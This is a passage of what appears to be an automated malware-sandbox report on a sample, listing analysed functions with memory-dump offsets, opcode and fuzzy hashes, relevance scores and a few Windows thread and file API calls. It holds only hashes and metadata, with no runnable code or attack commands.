                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF84915B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84915B000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff84915b000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d180ea79d5c5b9a62d517ad7efb655fe2c4baddbb5841ac58692d19562c2296a
                                                          • Instruction ID: b6259897bd23a9c1f9d2d40458102c164f968a5846efae320a926c5b9c59fa7b
                                                          • Opcode Fuzzy Hash: d180ea79d5c5b9a62d517ad7efb655fe2c4baddbb5841ac58692d19562c2296a
                                                          • Instruction Fuzzy Hash: C4E0EC10E1D6C29FE77A6B741895139BBE09F0B3D475509B9C14A8E2D3C95C28459B22
                                                          Function 00007FF849163797 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF84915B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84915B000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff84915b000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34526bfee53a4b2ed916778d58b65822f53bd36913d4d0e571e8e2243d637f22
                                                          • Instruction ID: 97795417916853bd29e88775537009b9bbffbf9334b6ce82dfb0d3c42095c878
                                                          • Opcode Fuzzy Hash: 34526bfee53a4b2ed916778d58b65822f53bd36913d4d0e571e8e2243d637f22
                                                          • Instruction Fuzzy Hash: 51E01291E1C2C29FF73B2E7408550392AE09F073C179405B6C44A8A3C3EE5D2C079E51
                                                          Function 00007FF8493921CD Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849390000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e3d802c5bdb927c2ec2dd1faaf0f42fce56c7df0fa87a3ba2a3add5d8691fdbe
                                                          • Instruction ID: 159216bd328bc9bfe2655137b72afbd56b5b4352cded0c6214a4c20c22e7f535
                                                          • Opcode Fuzzy Hash: e3d802c5bdb927c2ec2dd1faaf0f42fce56c7df0fa87a3ba2a3add5d8691fdbe
                                                          • Instruction Fuzzy Hash: 1EE09A34E1E6AD8EDB64EF688840BA9B7B1FF16350F5000E5C04CA3242CA346E85CF01
                                                          Function 00007FF84917A63B Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF849177000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849177000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849177000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7230f68c0ed86ce50760161183ccfd4acb87f2b39e4a821ac2d4d912596c7e3c
                                                          • Instruction ID: f3c58c2d392924d252f28327ff4e2087f291681a4698509895300335d76a30fe
                                                          • Opcode Fuzzy Hash: 7230f68c0ed86ce50760161183ccfd4acb87f2b39e4a821ac2d4d912596c7e3c
                                                          • Instruction Fuzzy Hash: 32D0C91CA0E6C3CDF23D7E01806023911918F11782EF040FFE09F418C1CD1D79026E02
                                                          Function 00007FF8491802EB Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF849177000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849177000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849177000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8c1768e4a4c1879430f189d47c2e120169516e687067c305d3bd29b613258418
                                                          • Instruction ID: 3faf4ff87ebd841dd49d70bb16adf61322f5c5fb4c55869ae78fca5a0c70f4f3
                                                          • Opcode Fuzzy Hash: 8c1768e4a4c1879430f189d47c2e120169516e687067c305d3bd29b613258418
                                                          • Instruction Fuzzy Hash: 89D09210A0D58B8EF678EE4140606B961915F013C0E22043DC46F518C1891DB9017A32
                                                          Function 00007FF849152ADB Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849150000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c5f62e5360b13b79c83002abfe94f5e55dad4777fac0f62a2eed4bc95dbbb86
                                                          • Instruction ID: fd8bd938092b1c01e66d99fef3e90c86e5c11674d9b4da77b4f9bb266e7efd68
                                                          • Opcode Fuzzy Hash: 6c5f62e5360b13b79c83002abfe94f5e55dad4777fac0f62a2eed4bc95dbbb86
                                                          • Instruction Fuzzy Hash: B7D0C916A0C6C38DF67DBE21416063A91915F057A0F22083EC46F41CD1CD1CB842BA02
                                                          Function 00007FF84916427B Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF84915B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84915B000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff84915b000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 61a40d3cf6e15dab64fccae4e4d47597c5b5d6015f0e832f2ad277dff738981f
                                                          • Instruction ID: ff5600a9200db96a8152a54ae7623ed22792c7bc5c192521411568f2a342545e
                                                          • Opcode Fuzzy Hash: 61a40d3cf6e15dab64fccae4e4d47597c5b5d6015f0e832f2ad277dff738981f
                                                          • Instruction Fuzzy Hash: 5FD09528E0D6D38FF27B6E02906123A22A49F00380E30023ED0AF819C5891CBC426A02
                                                          Function 00007FF84915EADB Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF84915B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84915B000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff84915b000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                          • Instruction ID: 5b0c19e58a30fabf3f72155920812b47e11141bbc145f90de761b17560caac21
                                                          • Opcode Fuzzy Hash: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                          • Instruction Fuzzy Hash: 1CD0C954E0C5E3ADF139BE2140A827AD5916F013A0F66007ED47F418C1CD1CB8416E02
                                                          Function 00007FF849152AEE Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849150000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5563205c5dd2ff00ec2dfe4025f0c9649ef7740e4f50e4cc949c68161cb76c3c
                                                          • Instruction ID: a7a98b9490fd527ab0fca6ca865a3665aeae3182aecb846d1aeb64b7270b721d
                                                          • Opcode Fuzzy Hash: 5563205c5dd2ff00ec2dfe4025f0c9649ef7740e4f50e4cc949c68161cb76c3c
                                                          • Instruction Fuzzy Hash: 23C08C2080C7838FF37ABB20802163577609F053E0F2248B9C80E4A8E2CE2C7981AA12
                                                          Function 00007FF84915EAEE Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF84915B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84915B000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff84915b000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c26eba563a26d91e49756930272b7e561ce193f96bf6709cf5e85e169b1e10d
                                                          • Instruction ID: 3b1f8bb2df5db90fcc6b2eb19edbe19194905fefed318971edfe3ec162e4654d
                                                          • Opcode Fuzzy Hash: 5c26eba563a26d91e49756930272b7e561ce193f96bf6709cf5e85e169b1e10d
                                                          • Instruction Fuzzy Hash: 16C08010C0C1C34FF235BB10806937577519F013D0F124075C41E494D1CD1C39415A11
                                                          Function 00007FF84939576B Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849390000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 801b0439ce70bad0625994521936860bcae5b0779ff24d4d435432e7826783f8
                                                          • Instruction ID: 10d1e8f8514907c6d86c691c758ddee3545cba16f8c63aaaa1b4d505bae20d0e
                                                          • Opcode Fuzzy Hash: 801b0439ce70bad0625994521936860bcae5b0779ff24d4d435432e7826783f8
                                                          • Instruction Fuzzy Hash: 83B09230A1D587DEF6787E3800046381482AF4A789BA01C78940FC2289DC39A5815A00
                                                          Function 00007FF849179B81 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF849177000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849177000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849177000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ffc4feeed5d67da2f431a81c625bd3c0f197f172cefdf09a6d949af9ff1863ff
                                                          • Instruction ID: 1ea8ae6395cf06f78977985adfee3c66f77eb252e8495689ff65e6683d6fce29
                                                          • Opcode Fuzzy Hash: ffc4feeed5d67da2f431a81c625bd3c0f197f172cefdf09a6d949af9ff1863ff
                                                          • Instruction Fuzzy Hash: E3B00201F5C2C39FF5343CB4456557C00550B452D5B5405B5D52F5A1C3DC6C39445B51

                                                          Non-executed Functions

                                                          Function 00007FF848A92150 Relevance: 5.1, Strings: 4, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A86000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a86000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: &$I$m$v
                                                          • API String ID: 0-3742301045
                                                          • Opcode ID: 1f1f42b961e7ab586aed3f2fd699b4ebf85f13306209b41e58f25a4eb32efb9d
                                                          • Instruction ID: e5410e584dc3cda4da23da5a1fab1a3c91482b9a435a1f9f7e1107301826de0b
                                                          • Opcode Fuzzy Hash: 1f1f42b961e7ab586aed3f2fd699b4ebf85f13306209b41e58f25a4eb32efb9d
                                                          • Instruction Fuzzy Hash: 6B411770D0D62D8FEB94EB58C8857ECB6F1EB58395F1445B9C00DA7281CBB85A84CF19
                                                          Function 00007FF84939C053 Relevance: 5.1, Strings: 4, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849390000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: G$`$b$r
                                                          • API String ID: 0-841970293
                                                          • Opcode ID: 5be175d9c921d439411e1d1e6ea35b446a656af9e4cca8cbe730b38e4c466cdc
                                                          • Instruction ID: e2209719b0b6dc119ed0a743a55e74b2bc9c519947a9badc0e57895cbcd660bb
                                                          • Opcode Fuzzy Hash: 5be175d9c921d439411e1d1e6ea35b446a656af9e4cca8cbe730b38e4c466cdc
                                                          • Instruction Fuzzy Hash: 4B310B70908669CFEB69EF08C885BB8B3F0FB54745F1041EAC04EA7291DB746A818F50

                                                          Execution Graph

                                                          Execution Coverage:5.3%
                                                          Dynamic/Decrypted Code Coverage:25%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:12
                                                          Total number of Limit Nodes:0
                                                          execution_graph 25971 7ff848bc09f5 25972 7ff848bc0a0f GetFileAttributesW 25971->25972 25974 7ff848bc0ad5 25972->25974 25963 7ff848bbecd9 25964 7ff848bbece7 CloseHandle 25963->25964 25966 7ff848bbedc4 25964->25966 25975 7ff848bbeb78 25976 7ff848bbebb3 ResumeThread 25975->25976 25978 7ff848bbec84 25976->25978 25967 7ff848bbd35d 25968 7ff848bbd36b SuspendThread 25967->25968 25970 7ff848bbd444 25968->25970

                                                          Executed Functions

                                                          Function 00007FF848A10DA0 Relevance: .3, Instructions: 294COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2673288042.00007FF848A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848a10000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e51ba9e60965f43794b4ca841c8b45a47050124f1ea2172ee44495ca00eab034
                                                          • Instruction ID: c43a48a485e6f34a5297a1d7c20e92d093b1eac6ef42145ff0466526b85dd56e
                                                          • Opcode Fuzzy Hash: e51ba9e60965f43794b4ca841c8b45a47050124f1ea2172ee44495ca00eab034
                                                          • Instruction Fuzzy Hash: 49A1AA7191DA999FE788EF6898667AE7FE1FB5A351F40007ED008D72D2CBB818118721
                                                          Function 00007FF8493512D4 Relevance: 3.0, Strings: 2, Instructions: 520COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2709195902.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff849350000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `<2I$`<2I
                                                          • API String ID: 0-3217421201
                                                          • Opcode ID: 39937b6f2235e5cea7dedef4d481bbf7a8f7fb1b2b90ab2a614ec5f63ef86556
                                                          • Instruction ID: 0b1ce1dc44451898f23cb4996bcd610823c9aa02c4a7a3678b98eb59edb38f95
                                                          • Opcode Fuzzy Hash: 39937b6f2235e5cea7dedef4d481bbf7a8f7fb1b2b90ab2a614ec5f63ef86556
                                                          • Instruction Fuzzy Hash: E1125670A1895D8FDFA8EF58C898FA9B7B1FB69305F1041A9D00EE7261DA359D81CF40
                                                          Function 00007FF848BBEB78 Relevance: 1.7, APIs: 1, Instructions: 160threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 315 7ff848bbeb78-7ff848bbebb1 316 7ff848bbebb3 315->316 317 7ff848bbebb4-7ff848bbec82 ResumeThread 315->317 316->317 321 7ff848bbec84 317->321 322 7ff848bbec8a-7ff848bbecd4 317->322 321->322
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2687866304.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848bb0000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: f17f80eff171bf905ef0303bc4e6fd4a88414e4f2f2c36854fa2535c6784a42f
                                                          • Instruction ID: 008d127d1cfce58c0bcfd088826deba3a899d2f78c409df8583f131a01fdcfb8
                                                          • Opcode Fuzzy Hash: f17f80eff171bf905ef0303bc4e6fd4a88414e4f2f2c36854fa2535c6784a42f
                                                          • Instruction Fuzzy Hash: B5518B7090C78C8FDB55DFA8C895AE8BFF0EF56310F1441ABD049DB292DA359846CB11
                                                          Function 00007FF848BBD35D Relevance: 1.6, APIs: 1, Instructions: 141threadinjectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 325 7ff848bbd35d-7ff848bbd369 326 7ff848bbd374-7ff848bbd442 SuspendThread 325->326 327 7ff848bbd36b-7ff848bbd373 325->327 331 7ff848bbd444 326->331 332 7ff848bbd44a-7ff848bbd494 326->332 327->326 331->332
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2687866304.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848bb0000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: SuspendThread
                                                          • String ID:
                                                          • API String ID: 3178671153-0
                                                          • Opcode ID: 8013a6dab8552cd62356d4136aaac67af86d73cce73bbac7537abca6127436f1
                                                          • Instruction ID: 4deca85d24e1c2a5741fc7739606152374d96ec976e668271e23596470d76a77
                                                          • Opcode Fuzzy Hash: 8013a6dab8552cd62356d4136aaac67af86d73cce73bbac7537abca6127436f1
                                                          • Instruction Fuzzy Hash: D7414A70D0864D8FDB98EFA8D885AEDBBF0EB5A310F10416AD049E7252DA34A845CB45
                                                          Function 00007FF848BC09F5 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 335 7ff848bc09f5-7ff848bc0ad3 GetFileAttributesW 339 7ff848bc0ad5 335->339 340 7ff848bc0adb-7ff848bc0b19 335->340 339->340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2687866304.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848bb0000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 6a5aa98bc5ebd8a712601f91fbedbb7bf08e70b8705b7f8f6c83b9356438df6d
                                                          • Instruction ID: e5b51cc2cc905b45683db38996d16b9b43250b788fcfe78ad74effa9730afdc1
                                                          • Opcode Fuzzy Hash: 6a5aa98bc5ebd8a712601f91fbedbb7bf08e70b8705b7f8f6c83b9356438df6d
                                                          • Instruction Fuzzy Hash: C341F770E08A4C8FDB98EF98D485BEDBBF0EB5A310F10416ED049E7252DA75A845CB45
                                                          Function 00007FF8493508B8 Relevance: 1.6, Strings: 1, Instructions: 337COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2709195902.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff849350000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `<2I
                                                          • API String ID: 0-3580074414
                                                          • Opcode ID: b136daf3a2af121b087d0af0979114aac312a8477c8f56365e4f0ebd12ccd82a
                                                          • Instruction ID: dc9d2e1123c4cdb042331a3056c55b5847d68a96b0af410f1f0923538dcabeff
                                                          • Opcode Fuzzy Hash: b136daf3a2af121b087d0af0979114aac312a8477c8f56365e4f0ebd12ccd82a
                                                          • Instruction Fuzzy Hash: BDD16534A0891D8FDFA9EF18C894BA9B7B5FB69705F1041D9D00EE7261DA35AE81CF40
                                                          Function 00007FF848BBECD9 Relevance: 1.4, APIs: 1, Instructions: 145COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 515 7ff848bbecd9-7ff848bbece5 516 7ff848bbecf0-7ff848bbedc2 CloseHandle 515->516 517 7ff848bbece7-7ff848bbecef 515->517 521 7ff848bbedc4 516->521 522 7ff848bbedca-7ff848bbee1e 516->522 517->516 521->522
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2687866304.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848bb0000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: fc995ec7355d825933ea99a4ecfe2bd154e9731efd6ed7868ef19b96b7242782
                                                          • Instruction ID: e80482d83e14e166feac1e3ea287c989414e75039ebc2ed3ac63cfd765a59151
                                                          • Opcode Fuzzy Hash: fc995ec7355d825933ea99a4ecfe2bd154e9731efd6ed7868ef19b96b7242782
                                                          • Instruction Fuzzy Hash: E9416D70D0865C8FDB59DFA8C885BEDBBF0EF56310F1041AAD449EB292DB74A845CB41
                                                          Function 00007FF8493530C8 Relevance: .3, Instructions: 316COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2709195902.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff849350000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6809bea61e49d571a375e1c83bddde7034bbdd3019d727f889e0cb5b4c111db
                                                          • Instruction ID: 5b32739c3a64bd6f0391f011a9f15e93fe2822f834a65b5157ebdccf4042030c
                                                          • Opcode Fuzzy Hash: f6809bea61e49d571a375e1c83bddde7034bbdd3019d727f889e0cb5b4c111db
                                                          • Instruction Fuzzy Hash: AD91E231A1CE5A4FEB6CEE28D445975B3E1FFA9360B14067AD44EC3696DE34F8428780
                                                          Function 00007FF848A1090D Relevance: .2, Instructions: 172COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2673288042.00007FF848A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848a10000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d95803ace25db25ab7198452e491769bfa97bf4efbff938c0afc9269755ecef6
                                                          • Instruction ID: e0259121cf62d2da8f0c850a2558a48d9645436e8c9ae64ce967d117629def13
                                                          • Opcode Fuzzy Hash: d95803ace25db25ab7198452e491769bfa97bf4efbff938c0afc9269755ecef6
                                                          • Instruction Fuzzy Hash: 6F51AC3190DA599FDB44FFA8E485AED7BA0FF89360F04057AD048D7296CB34A881CB84
                                                          Function 00007FF848A10910 Relevance: .2, Instructions: 170COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2673288042.00007FF848A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848a10000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8c686975d28fd82693b9fa5256ce74fae7c951510407c9c5a083b5152b7b40a1
                                                          • Instruction ID: f9987ca07160a968499085df03224d1974bdbaf69c32861d953b515233458a1a
                                                          • Opcode Fuzzy Hash: 8c686975d28fd82693b9fa5256ce74fae7c951510407c9c5a083b5152b7b40a1
                                                          • Instruction Fuzzy Hash: B951AB3190DA599FDB44FFA8E485AFD7BA0FF89360F04057AD448D7296CB34A881CB84
                                                          Function 00007FF848A10960 Relevance: .1, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2673288042.00007FF848A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848a10000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 671a1b70a7c61d7ffe739691d431219607239f69cda9eee5fef8b85b3d0b3a49
                                                          • Instruction ID: a6e6da5579cd4a75f5f8fe9b47b9cda71584cc0c6298c72b60234b0005bcb622
                                                          • Opcode Fuzzy Hash: 671a1b70a7c61d7ffe739691d431219607239f69cda9eee5fef8b85b3d0b3a49
                                                          • Instruction Fuzzy Hash: 47417B70909A5D9FDB84FFA8E485AED7BE1FF98351F00017AD40DD3296CB34A8818B94
                                                          Function 00007FF848A10908 Relevance: .1, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2673288042.00007FF848A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848a10000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d0de7201727526115a8bf1aca20be2aa20c084fd7bac7d87e5f5c8882a8afb4e
                                                          • Instruction ID: c929b4424ea96ded7753e36f9ac3204edad0d51b6dddb8239e1e4bb7cf85b049
                                                          • Opcode Fuzzy Hash: d0de7201727526115a8bf1aca20be2aa20c084fd7bac7d87e5f5c8882a8afb4e
                                                          • Instruction Fuzzy Hash: B3516830A0890E9FCF84EF58D485EEDBBF1EB68355F150269E409E7261DB74E8908B91
                                                          Function 00007FF848A10998 Relevance: .1, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2673288042.00007FF848A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848a10000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a71676e3b024d0249392f4f26ded3664714573536ed77ef4915c9bc18f85ca9
                                                          • Instruction ID: 87a324381015cee216ed1befd3a37ba6705cc550777fdbedb42c891d78cf73c4
                                                          • Opcode Fuzzy Hash: 5a71676e3b024d0249392f4f26ded3664714573536ed77ef4915c9bc18f85ca9
                                                          • Instruction Fuzzy Hash: F3412930919A5D9FDB84EFA8C499AEDBBF1FF58351F00016AD409E3295CB34A881CB95
                                                          Function 00007FF848A18FF2 Relevance: .1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2673288042.00007FF848A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
